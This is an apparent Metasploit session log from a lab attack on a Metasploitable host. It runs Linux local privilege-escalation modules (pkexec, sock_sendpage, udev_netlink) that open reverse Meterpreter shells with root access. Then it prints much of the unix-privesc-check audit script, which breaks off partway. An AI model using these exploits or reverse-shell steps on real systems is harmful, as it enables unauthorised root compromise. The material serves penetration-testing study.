     Module: exploit/linux/local/vmware_mount
   Platform: Linux
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-08-22

Provided by:
  Tavis Ormandy
  egypt

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  SESSION      3                yes       The session to run this module on.
  WRITABLEDIR  /tmp             yes       A directory where you can write files.

Payload information:

Description:
  VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us.

References:
  http://cvedetails.com/cve/2013-1662/
  http://www.osvdb.org/96588
  http://www.securityfocus.com/bid/61966
  http://blog.cmpxchg8b.com/2013/08/security-debianisms.html
  http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html
  https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit

Started reverse TCP handler on 192.168.26.207:4444
Exploit aborted due to failure: not-vulnerable: vmware-mount doesn't exist or is not setuid
Exploit completed, but no session was created.

PostExploit: exploit/linux/local/pkexec

       Name: Linux PolicyKit Race Condition Privilege Escalation
     Module: exploit/linux/local/pkexec
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2011-04-01

Provided by:
  xi4oyu
  0a29406d9794e4f9b30b3c5d6702c708

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x64

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  Count            500              yes       Number of attempts to win the race condition
  DEBUG_EXPLOIT    false            yes       Make the exploit executable be verbose about what it's doing
  ListenerTimeout  60               yes       Number of seconds to wait for the exploit
  SESSION          3                yes       The session to run this module on.
  WritableDir      /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec.
  Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10), 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)

References:
  http://cvedetails.com/cve/2011-1485/
  https://www.exploit-db.com/exploits/17942
  http://www.osvdb.org/72261

Started reverse TCP handler on 192.168.26.207:4444
Writing exploit executable to /tmp/tkqlVDJv (4346 bytes)
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Starting the payload handler...
Meterpreter session 8 opened (192.168.26.207:4444 -> 192.168.26.134:53181) at 2016-05-26 12:40:00 +0100
> Background session 8? [y/N]

PostExploit: exploit/linux/local/sock_sendpage

       Name: Linux Kernel Sendpage Local Privilege Escalation
     Module: exploit/linux/local/sock_sendpage
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-08-13

Provided by:
  Tavis Ormandy
  Julien Tinnes
  spender
  rcvalle
  egypt

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  DEBUG_EXPLOIT  false            yes       Make the exploit executable be verbose about what it's doing
  SESSION        3                yes       The session to run this module on.
  WritableDir    /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c.
  All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4

References:
  http://cvedetails.com/cve/2009-2692/
  http://www.osvdb.org/56992
  http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html

Started reverse TCP handler on 192.168.26.207:4444
Writing exploit executable to /tmp/vBZN3mz3 (4069 bytes)
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Meterpreter session 9 opened (192.168.26.207:4444 -> 192.168.26.134:53182) at 2016-05-26 12:40:28 +0100
> Background session 9? [y/N]

PostExploit: exploit/linux/local/udev_netlink

       Name: Linux udev Netlink Local Privilege Escalation
     Module: exploit/linux/local/udev_netlink
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-04-16

Provided by:
  kcope
  Jon Oberheide
  egypt

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x64

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  NetlinkPID                    no        Usually udevd pid-1. Meterpreter sessions will autodetect
  SESSION      3                yes       The session to run this module on.
  WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland.

References:
  http://cvedetails.com/cve/2009-1185/
  http://www.osvdb.org/53810
  http://www.securityfocus.com/bid/34536

Started reverse TCP handler on 192.168.26.207:4444
Attempting to autodetect netlink pid...
Meterpreter session, using get_processes to find netlink pid
udev pid: 2352
Found netlink pid: 2351
Writing payload executable (155 bytes) to /tmp/vMcnFDaLCv
Writing exploit executable (1879 bytes) to /tmp/jbuSlmKnHp
chmod'ing and running it...
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Meterpreter session 10 opened (192.168.26.207:4444 -> 192.168.26.134:53183) at 2016-05-26 12:40:59 +0100
> Background session 10?
[y/N]

Active sessions
===============

  Id  Type                   Information                                                     Connection
  --  ----                   -----------                                                     ----------
  1   shell unix                                                                             192.168.26.207:4444 -> 192.168.26.134:55144 (192.168.26.134)
  2   shell unix                                                                             192.168.26.207:4444 -> 192.168.26.134:55146 (192.168.26.134)
  3   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4433 -> 192.168.26.134:44060 (192.168.26.134)
  4   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4433 -> 192.168.26.134:44061 (192.168.26.134)
  5   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4444 -> 192.168.26.134:53178 (192.168.26.134)
  6   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4444 -> 192.168.26.134:53179 (192.168.26.134)
  7   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4444 -> 192.168.26.134:53180 (192.168.26.134)
  8   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4444 -> 192.168.26.134:53181 (192.168.26.134)
  9   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable  192.168.26.207:4444 -> 192.168.26.134:53182 (192.168.26.134)
  10  meterpreter x86/linux                                                                  192.168.26.207:4444 -> 192.168.26.134:53183 (192.168.26.134)

Choose SHELL sessions
Running 'echo -e "..."' on the shell session; the quoted argument is the unix-privesc-check script below, shown with its \n escapes expanded:

#!/bin/sh
# unix-privesc-check - Checks Unix system for simple privilege escalations
# Copyright (C) 2008 pentestmonkey@pentestmonkey.net
#
#
# License
# -------
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If you do not accept these condition then
# you are prohibited from using this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
#
# Description
# -----------
# Auditing tool to check for weak file permissions and other problems that
# may allow local attackers to escalate privileges.
# 
# It is intended to be run by security auditors and pentetration testers 
# against systems they have been engaged to assess, and also by system 
# admnisitrators who want to check for "obvious" misconfigurations.  It 
# can even be run as a cron job so you can check regularly for misconfigurations 
# that might be introduced.
#
# Ensure that you have the appropriate legal permission before running it
# someone else's system.
#
# TODO List
# ---------
# There's still plenty that this script doesn't do...
# - Doesn't work for shell scripts!  These appear as "/bin/sh my.sh" in the process listing. 
#   This script only checks the perms of /bin/sh.  Not what we're after.  :-(
# - Similarly for perl scripts.  Probably python, etc. too.
# - Check /proc/pid/cmdline for absolute path names.  Check security of these (e.g. /etc/snmp/snmpd.conf)
# - Check everything in root's path - how to find root's path?
# - /proc/pid/maps, smaps are readable and lists some shared objects.  We should check these.
# - /proc/pid/fd contain symlinks to all open files (but you can't see other people FDs)
# - check for trust relationships in /etc/hosts.equiv
# - NFS imports / exports / automounter
# - Insecure stuff in /etc/fstab (e.g. allowing users to mount file systems)
# - Inspecting people's PATH.  tricky.  maybe read from /proc/pid/environ, .bashrc, /etc/profile, .bash_profile
# - Check if /etc/init.d/* scripts are readable.  Advise user to audit them if they are.
# - .exrc?
# - X11 trusts, apache passwd files, mysql trusts?
# - Daemons configured in an insecure way: tftpd, sadmind, rexd
# - World writable dirs aren't as bad if the sticky bit is set.  Check for this before reporting vulns.
# - Maybe do a strings of binaries (and their .so's?)
# - Do a better job of parsing cron lines - search for full paths
# - Maybe LDPATHs from /etc/env.d
# - Check if ldd, ld.so.conf changes have broken this script on non-linux systems.
# - Avoid check certain paths e.g. /-/_ clearly isn't a real directory.
# - create some sort of readable report
# - indicate when it's likely a result is a false positive and when it's not.
# - Skip pseudo processes e.g. [usb-storage]
# - File permission on kernel modules
# - Replace calls to echo with a my_echo func.  Should be passed a string and an "importance" value:
#   - my_echo 1 "This is important and should always be printed out"
#   - my_echo 2 "This is less important and should only be printed in verbose mode"
# - We check some files / dirs multiple times.  Slow.  Can we implement a cache?
# - grep for PRIVATE KEY to find private ssh and ssl keys.  Where to grep?
# - check SGID programs

VERSION="1.4"
HOME_DIR_FILES=".netrc .ssh/id_rsa .ssh/id_dsa .rhosts .shosts .my.cnf .ssh/authorized_keys .bash_history .sh_history .forward"
CONFIG_FILES="/etc/passwd /etc/group /etc/master.passwd /etc/inittab /etc/inetd.conf /etc/xinetd.con /etc/xinetd.d/* /etc/contab /etc/fstab /etc/profile /etc/sudoers"
PGDIRS="/usr/local/pgsql/data ~postgres/postgresql/data ~postgres/data ~pgsql/data ~pgsql/pgsql/data /var/lib/postgresql/data /etc/postgresql/8.2/main /var/lib/pgsql/data"

get_owner () {
    GET_OWNER_FILE=$1
    GET_OWNER_RETURN=`ls -lLd "$GET_OWNER_FILE" | awk '{print $3}'`
}

get_group () {
    GET_GROUP_FILE=$1
    GET_GROUP_RETURN=`ls -lLd "$GET_GROUP_FILE" | awk '{print $4}'`
}

usage () {
    echo "unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )"
    echo
    echo "Usage: unix-privesc-check { standard | detailed }"
    echo
    echo '"standard" mode: Speed-optimised check of lots of security settings.'
    echo 
    echo '"detailed" mode: Same as standard mode, but also checks perms of open file'
    echo '                 handles and called files (e.g. parsed from shell scripts,'
    echo '                 linked .so files).  This mode is slow and prone to false '
    echo '                 positives but might help you find more subtle flaws in 3rd'
    echo '                 party programs.'
    echo
    echo "This script checks file permissions and other settings that could allow"
    echo "local users to escalate privileges."
    echo 
    echo "Use of this script is only permitted on systems which you have been granted" 
    echo "legal permission to perform a security assessment of.  Apart from this "
    echo "condition the GPL v2 applies."
    echo
    echo "Search the output for the word 'WARNING'.  If you don't see it then this"
    echo "script didn't find any problems."
    echo 
}

banner () {
    echo "Starting unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )"
    echo
    echo "This script checks file permissions and other settings that could allow"
    echo "local users to escalate privileges."
    echo 
    echo "Use of this script is only permitted on systems which you have been granted" 
    echo "legal permission to perform a security assessment of.  Apart from this "
    echo "condition the GPL v2 applies."
    echo
    echo "Search the output below for the word 'WARNING'.  If you don't see it then"
    echo "this script didn't find any problems."
    echo 
}

MODE=$1

if [ ! "$MODE" = "standard" ] && [ ! "$MODE" = "detailed" ]; then
    usage
    exit 0
fi

# Parse any full paths from $1 (config files, progs, dirs).
# Check the permissions on each of these.
check_called_programs () {
    CCP_MESSAGE_STACK=$1
    CCP_FILE=$2
    CCP_USER=$3
    CCP_PATH=$4 # optional

    # Check the perms of the supplied file regardless
    # The caller doesn't want to have to call check_perms as well as check_called_programs
    check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH"

    # Skip the slow check if we're in quick mode
    if [ "$MODE" = "standard" ]; then
        return 0;
    fi

    # Check if file is text or not
    IS_TEXT=`file "$CCP_FILE" | grep -i text`
    IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'`

    # Process shell scripts (would also work on config files that reference other files)
    if [ ! -z "$IS_TEXT" ]; then
        # Parse full paths from file - ignoring commented lines
        CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`
        for CALLED_FILE in $CALLED_FILES; do
            # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms."
            check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"
        done
    else
        # Process dynamically linked binaries
        if [ ! -z "$IS_DYNBIN" ]; then

            CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^/]*\///' | cut -f 1 -d ' '`
            for CALLED_FILE in $CALLED_FILES; do
                check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"
            done

            # Strings binary to look for hard-coded config files 
            # or other programs that might be called.
            for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; do
                check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"
            done
        fi
    fi
}

# Parse any full paths from $1 (config files, progs, dirs).
# Check the permissions on each of these.
check_called_programs_suid () {
    CCP_FILE=$1
    CCP_PATH=$2 # optional

    get_owner $CCP_FILE; CCP_USER=$GET_OWNER_RETURN
    CCP_MESSAGE_STACK="$CCP_FILE is SUID $CCP_USER."
    LS=`ls -l $CCP_FILE`
    echo "Checking SUID-$CCP_USER program $CCP_FILE: $LS"

    # Don't check perms of executable itself
    # check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH"

    # Check if file is text or not
    IS_TEXT=`file "$CCP_FILE" | grep -i text`
    IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'`

    # Process shell scripts (would also work on config files that reference other files)
    if [ ! -z "$IS_TEXT" ]; then
        # Skip the slow check if we're in quick mode
        if [ "$MODE" = "standard" ]; then
            return 0;
        fi

        # Parse full paths from file - ignoring commented lines
        CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`
        for CALLED_FILE in $CALLED_FILES; do
            # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms."
            check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"
        done
    else
        # Process dynamically linked binaries
        if [ ! -z "$IS_DYNBIN" ]; then

            CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^/]*\///' | cut -f 1 -d ' '`
            for CALLED_FILE in $CALLED_FILES; do
                check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"
            done

            # Skip the slow check if we're in quick mode
            if [ "$MODE" = "standard" ]; then
                return 0;
            fi

            # Strings binary to look for hard-coded config files 
            # or other programs that might be called.
            for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; do
                check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"
            done
        fi
    fi
}

# Check if $1 can be changed by users who are not $2
check_perms () {
    CP_MESSAGE_STACK=$1
    CHECK_PERMS_FILE=$2
    CHECK_PERMS_USER=$3
    CHECK_PERMS_PATH=$4 # optional

    if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -d "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; then
        CHECK_PERMS_FOUND=0
        if [ ! -z "$CHECK_PERMS_PATH" ]; then 
            # Look for it in the supplied path
            for DIR in `echo "$CHECK_PERMS_PATH" | sed 's/:/ /g'`; do
                if [ -f "$DIR/$CHECK_PERMS_FILE" ]; then
                    CHECK_PERMS_FOUND=1
                    CHECK_PERMS_FILE="$DIR/$CHECK_PERMS_FILE"
                    break
                fi
            done
        fi

        #if [ "$CHECK_PERMS_FOUND" = "0" ]; then
        #    echo "ERROR: File $CHECK_PERMS_FILE doesn't exist.  Checking parent path anyway."
        #    # return 0
        # fi
    fi

    C=`echo "$CHECK_PERMS_FILE" | cut -c 1`
    if [ ! "$C" = "/" ]; then
        echo "ERROR: Can't find absolute path for $CHECK_PERMS_FILE.  Skipping."
        return 0
    fi

    echo "    Checking if anyone except $CHECK_PERMS_USER can change $CHECK_PERMS_FILE"

    while [ -n "$CHECK_PERMS_FILE" ]; do
        perms_secure "$CP_MESSAGE_STACK" $CHECK_PERMS_FILE $CHECK_PERMS_USER
        CHECK_PERMS_FILE=`echo $CHECK_PERMS_FILE | sed 's/\/[^/]*$//'`
    done
}

# Check if $1 can be read by users who are not $2
check_read_perms () {
    CP_MESSAGE_STACK=$1
    CHECK_PERMS_FILE=$2
    CHECK_PERMS_USER=$3

    if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; then
        echo "ERROR: File $CHECK_PERMS_FILE doesn't exist"
        return 0
    fi

    echo "    Checking if anyone except $CHECK_PERMS_USER can read file $CHECK_PERMS_FILE"

    perms_secure_read "$CP_MESSAGE_STACK" "$CHECK_PERMS_FILE" "$CHECK_PERMS_USER"
}

perms_secure_read () {
    PS_MESSAGE_STACK=$1
    PERMS_SECURE_FILE=$2
    PERMS_SECURE_USER=$3

    if [ ! -b "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -d "$PERMS_SECURE_FILE" ]; then
        echo "ERROR: No such file or directory: $PERMS_SECURE_FILE.  Skipping."
        return 0
    fi

    # Check if owner is different (but ignore root ownership, that's OK)
    only_user_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER

    # Check group read perm (but ignore root group, that's OK)
    group_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER

    # Check world read perm 
    world_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE
}

perms_secure () {
    PS_MESSAGE_STACK=$1
    PERMS_SECURE_FILE=$2
    PERMS_SECURE_USER=$3

    if [ ! -d "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -b "$PERMS_SECURE_FILE" ]; then
        # echo "ERROR: No such file or directory: $PERMS_SECURE_FILE.  Skipping."
        return 0
    fi

    # Check if owner is different (but ignore root ownership, that's OK)
    only_user_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER

    # Check group write perm (but ignore root group, that's OK)
    group_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER

    # Check world write perm 
    world_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE
}

only_user_can_write () {
    O_MESSAGE_STACK=$1
    O_FILE=$2
    O_USER=$3

    # We just need to check the owner really as the owner
    # can always grant themselves write access
    get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURN
    if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; then
        echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can write to $O_FILE"
    fi
}

group_can_write () {
    O_MESSAGE_STACK=$1
    O_FILE=$2
    O_USER=$3 # ignore group write access $3 is only member of group

    get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURN
    P=`ls -lLd $O_FILE | cut -c 6`
    if [ "$P" = "w" ] && [ ! "$O_GROUP" = "root" ]; then
        # check the group actually has some members other than $O_USER
        group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0
        if [ "$OTHER_MEMBERS" = "1" ]; then
            echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can write to $O_FILE"
        fi
    fi
}

group_has_other_members () {
    G_GROUP=$1
    G_USER=$2

    # If LDAP/NIS is being used this script can't check group memberships
    # we therefore assume the worst.
    if [ "$EXT_AUTH" = 1 ]; then
        OTHER_MEMBERS=1
        return 1
    fi

    GROUP_LINE=`grep "^$G_GROUP:" /etc/group`
    MEMBERS=`echo "$GROUP_LINE" | cut -f 4 -d : | sed 's/,/ /g'`

    GID=`echo "$GROUP_LINE" | cut -f 3 -d :`
    EXTRA_MEMBERS=`grep "^[^:]*:[^:]*:[0-9]*:$GID:" /etc/passwd | cut -f 1 -d : | xargs echo`

    for M in $MEMBERS; do
        if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; then
            OTHER_MEMBERS=1
            return 1
        fi
    done

    for M in $EXTRA_MEMBERS; do
        if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; then
            OTHER_MEMBERS=1
            return 1
        fi
    done

    OTHER_MEMBERS=0
    return 0
}

world_can_write () {
    O_MESSAGE_STACK=$1
    O_FILE=$2

    P=`ls -lLd $O_FILE | cut -c 9`
    S=`ls -lLd $O_FILE | cut -c 10`

    if [ "$P" = "w" ]; then
        if [ "$S" = "t" ]; then
            echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE (but sticky bit set)"
        else
            echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE"
        fi
    fi
}

only_user_can_read () {
    O_MESSAGE_STACK=$1
    O_FILE=$2
    O_USER=$3

    # We just need to check the owner really as the owner
    # can always grant themselves read access
    get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURN
    if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; then
        echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can read $O_FILE"
    fi
}

group_can_read () {
    O_MESSAGE_STACK=$1
    O_FILE=$2
    O_USER=$3

    get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURN
    P=`ls -lLd $O_FILE | cut -c 5`
    if [ "$P" = "r" ] && [ ! "$O_GROUP" = "root" ]; then
        # check the group actually has some members other than $O_USER
        group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0
        if [ "$OTHER_MEMBERS" = "1" ]; then
            echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can read $O_FILE"
        fi
    fi
}

world_can_read () {
    O_MESSAGE_STACK=$1
    O_FILE=$2

    P=`ls -lLd $O_FILE | cut -c 8`

    if [ "$P" = "w" ]; then
        echo "WARNING: $O_MESSAGE_STACK World read is set for $O_FILE"
    fi
}

section () {
    echo
    echo '############################################'
    echo $1
    echo '############################################'
}

# Guess OS
if [ -x /usr/bin/showrev ]; then
    OS="solaris"
    SHADOW="/etc/shadow"
elif [ -x /usr/sbin/sam -o -x /usr/bin/sam ]; then
    OS="hpux"
    SHADOW="/etc/shadow"
elif [ -f /etc/master.passwd ]; then
    OS="bsd"
    SHADOW="/etc/master.passwd"
else
    OS="linux"
    SHADOW="/etc/shadow"
fi
echo "Assuming the OS is: $OS"
CONFIG_FILES="$CONFIG_FILES $SHADOW"

# Set path so we can access usual directories.  HPUX and some linuxes don't have sbin in the path.
PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin; export PATH

# Check dependent programs are installed
# Assume "which" is installed!
PROGS="ls awk grep cat mount xargs file ldd strings"
for PROG in $PROGS; do
    which $PROG 2>&1 > /dev/null
    if [ ! $? = "0" ]; then
        echo "ERROR: Dependend program '$PROG' is mising.  Can't run.  Sorry!"
        exit 1
    fi
done

banner

section "Recording hostname"
hostname

section "Recording uname"
uname -a

section "Recording Interface IP addresses"
if [ $OS = 'hpux' ]; then
    for IFACE in `lanscan | grep x | awk '{print $5}' 2>/dev/null`; do
        ifconfig $IFACE 2>/dev/null
    done
else
    ifconfig -a
fi

section "Checking if external authentication is allowed in /etc/passwd"
FLAG=`grep '^+:' /etc/passwd`
if [ -n "$FLAG" ]; then
    echo "WARNING: /etc/passwd allows external authentcation:"
    grep '^+:' /etc/passwd
    EXT_AUTH=1
else
    echo "No +:... line found in /etc/passwd"
fi

section "Checking nsswitch.conf for addition authentication methods"
if [ -r "/etc/nsswitch.conf" ]; then
    NIS=`grep '^passwd' /etc/nsswitch.conf | grep 'nis'`
    if [ -n "$NIS" ]; then
        echo "WARNING: NIS is used for authentication on this system"
        EXT_AUTH=1
    fi
    LDAP=`grep '^passwd' /etc/nsswitch.conf | grep 'ldap'`
    if [ -n "$LDAP" ]; then
        echo "WARNING: LDAP is used for authentication on this system"
        EXT_AUTH=1
    fi

    if [ -z "$NIS" ] && [ -z "$LDAP" ]; then
        echo "Neither LDAP nor NIS are used for authentication"
    fi
else
    echo "ERROR: File /etc/nsswitch.conf isn't readable.  Skipping checks."
fi

# Check important config files aren't writable
section "Checking for writable config files"
for FILE in $CONFIG_FILES; do
    if [ -f "$FILE" ]; then
        check_perms "$FILE is a critical config file." "$FILE" root
    fi
done

section "Checking if $SHADOW is readable"
check_read_perms "/etc/shadow holds authentication data" $SHADOW root

section "Checking for password hashes in /etc/passwd"
FLAG=`grep -v '^[^:]*:[x*]*:' /etc/passwd | grep -v '^#'`
if [ -n "$FLAG" ]; then
    echo "WARNING: There seem to be some password hashes in /etc/passwd"
    grep -v '^[^:]*:[x*]*:' /etc/passwd | grep -v '^#'
    EXT_AUTH=1
else
    echo "No password hashes found in /etc/passwd"
fi

section "Checking account settings"
# Check for something nasty like r00t::0:0::/:/bin/sh in /etc/passwd
# We only need read access to /etc/passwd to be able to check this.
if [ -r "/etc/passwd" ]; then
    OPEN=`grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":"`
    if [ -n "$OPEN" ]; then
        echo "WARNING: The following accounts have no password:"
        grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":"
    fi
fi
if [ -r "$SHADOW" ]; then
    echo "Checking for accounts with no passwords"
    if [ "$OS" = "linux" ]; then
        passwd -S -a | while read LINE
        do
            USER=`echo "$LINE" | awk '{print $1}'`
            STATUS=`echo "$LINE" | awk '{print $2}'`
            if [ "$STATUS" = "NP" ]; then
                echo "WARNING: User $USER doesn't have a password"
            fi
        done
    elif [ "$OS" = "solaris" ]; then
        passwd -s -a | while read LINE
        do
            USER=`echo "$LINE" | awk '{print $1}'`
            STATUS=`echo "$LINE" | awk '{print $2}'`
            if [ "$STATUS" = "NP" ]; then
                echo "WARNING: User $USER doesn't have a password"
            fi
        done
    fi
else
    echo "File $SHADOW isn't readable.  Skipping some checks."
fi

section "Checking library directories from /etc/ld.so.conf"
if [ -f "/etc/ld.so.conf" ] && [ -r "/etc/ld.so.conf" ]; then
    for DIR in `grep '^/' /etc/ld.so.conf`; do
        check_perms "$DIR is in /etc/ld.so.conf." $DIR root
    done

    #FILES=`grep '^include' /etc/ld.so.conf | sed 's/^include *//'`
    #if [ ! -z "$FILES" ]; then
    #    for DIR in `echo $FILES | xargs cat | sort -u`; do
    #    done
    #fi
else
    echo "File /etc/ld.so.conf not present.  Skipping checks."
fi

# Check sudoers if we have permission - needs root normally
section "Checking sudo configuration"
if [ -f "/etc/sudoers" ] && [ -r "/etc/sudoers" ]; then
    echo -----------------
    echo "Checking if sudo is configured"
    SUDO_USERS=`grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep -v '^[ \t]*Default' | grep =`
    if [ ! -z "$SUDO_USERS" ]; then
        echo "WARNING: Sudo is configured.  Manually check nothing unsafe is allowed:"
        grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep = | grep -v '^[ \t]*Default'
    fi

    echo -----------------
    echo "Checking sudo users need a password"
